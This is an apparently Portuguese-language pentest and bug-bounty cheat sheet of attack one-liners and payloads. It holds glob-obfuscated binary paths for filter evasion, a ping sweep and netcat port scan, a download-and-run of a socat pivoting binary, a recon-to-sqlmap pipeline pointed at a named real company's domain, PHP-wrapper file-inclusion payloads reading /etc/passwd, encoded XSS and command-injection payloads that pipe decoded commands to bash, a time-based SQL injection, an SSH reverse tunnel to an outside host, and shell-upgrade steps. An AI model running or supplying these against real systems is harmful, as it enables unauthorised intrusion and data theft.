Esse script baixa as ferramentas mais utilizadas em pentest e bounts, cria arquivos txt passando como usa cada uma, e ainda baixa wordlists mais atuais de parâmetros, dns, diretorios e etc...
/bin/b??? -p || /bi?/b??? -p = bash/bin/ne?c?t || /bi?/ne?c?t = nc
/bin/p?t?o?3 || /bi?/p?t?o?3 = python3
/bin/p?t?o?2 || /bi?/p?t?o?2 = python2
/bin/c??l || /bi?/c??l = curl
/bin/w??t || /bi?/w??t = get
route|awk '{print $1}'|grep [[:digit:]] || ip route list |awk '{print $1}'|grep [[:digit:]];echo -e "\e[1;41;1;45mColoqueo ip assim -----> 172.0.0. tire o ultimo numero\e[0m" ;echo -en "Escolha o ip e coloque aqui -->: ";read num ; for i in $(seq 1 255);do ping -W 1 -c 1 $num$i | grep '64 bytes' | awk {'print $4'} | sed 's/.$//g';done > ipvalidos.txt ;for a in $(cat ipvalidos.txt);do nc -nv -w 1 -z $a 80 443 22 21 3306 25 445 139;done
Comand = wget https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat;chmod +x socat ;./socat -h
Tutorial = https://deephacking.tech/pivoting-con-socat/
Uso= ./socat tcp-l:7878,fork,reuseaddr tcp:172.16.0.147:80 &
pegando target das url:
subfinder -d tesla.com -silent -all | httpx -silent -threads 100 | katana -d 4 -jc -ef css,png,svg,ico,woff,gif | tee -a urls.txt
filtrando potenciais sqli:
cat urls | gf sqli | tee -a sqli.txt
gf = (ssrf,xss,ssti,sqli,redirect,rce,lfi,jsvar,interestingsubs,insterestingparams,interestingEXT,ido,dbug)
jogando para sqlmap:
while read line; do sqlmap -u $line --parse-erros --current-db --invalid-logical --invalid-bignum --invalid-string --riks 3;done < sqli.txt
php://filter/string.toupper/string.rot13/string.tolower/resource=file:///etc/passwdphp://filter/zlib.deflate/convert.base64-encode/resource=file:///etc/passwd
php://filter/convert.iconv.utf-8.utf-16le/resource=data://plain/text,trololohellooo=
php://filter/convert.quoted-printable-encode/resource=data://plain/text,£hellooo=
php://filter/convert.quoted-printable-encode/resource=data://plain/text,£hellooo=
php://filter/convert.base64-decode/resource=data://plain/text,aGVsbG8=
php://filter/string.strip_tags/resource=data://text/plain,Boldlalalala
php://filter/string.toupper/string.rot13/string.tolower/resource=file:///etc/passwd
php://filter/read=string.toupper|string.rot13|string.tolower/resource=file:///etc/passwd
/ssh:\/\/.*:.*@.*target\.com/
/ftp:\/\/.*:.*@.*taget\.com/
/ssh:\/\/.*:.*@.*\.com/ NOT "git"
ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i ./id_rsa -R 8888:10.0.1.2:80 -N teste@103.106.0.2 &
%22%20onbeforeinput=alert(document.domain)%20contenteditable%20alt=%22
data%3Atext%2Fhtml%3Bbase64%2CPGltZyBzcmM9eCBvbmVycm9yPWphdmFzY3JpcHQ6cHJvbXB0KGRvY3VtZW50LmRvbWFpbik%2B
;echo%20Y2F0IC9ldGMvcGFzc3dkCg==|base64%20-d|bash%00.zip | grep root:.*:0:0
"0'XOR(if(now()=sysdate(),sleep(6-2),0))XOR'Z.php
{ __schema { queryType { name } mutationType { name } subscriptionType { name } types { ...FullType } directives { name description locations args { ...InputValue } } } }
fragment FullType on __Type { kind name description fields(includeDeprecated: true) { name description args { ...InputValue } type { ...TypeRef } isDeprecated deprecationReason } inputFields { ...InputValue } interfaces { ...TypeRef } enumValues(includeDeprecated: true) { name description isDeprecated deprecationReason } possibleTypes { ...TypeRef } }
fragment InputValue on __InputValue { name description type { ...TypeRef } defaultValue }
fragment TypeRef on __Type { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name } } } } } } } } }
python -c 'import os;os.system("/bin/bash");
crtl + z
stty raw -echo && fg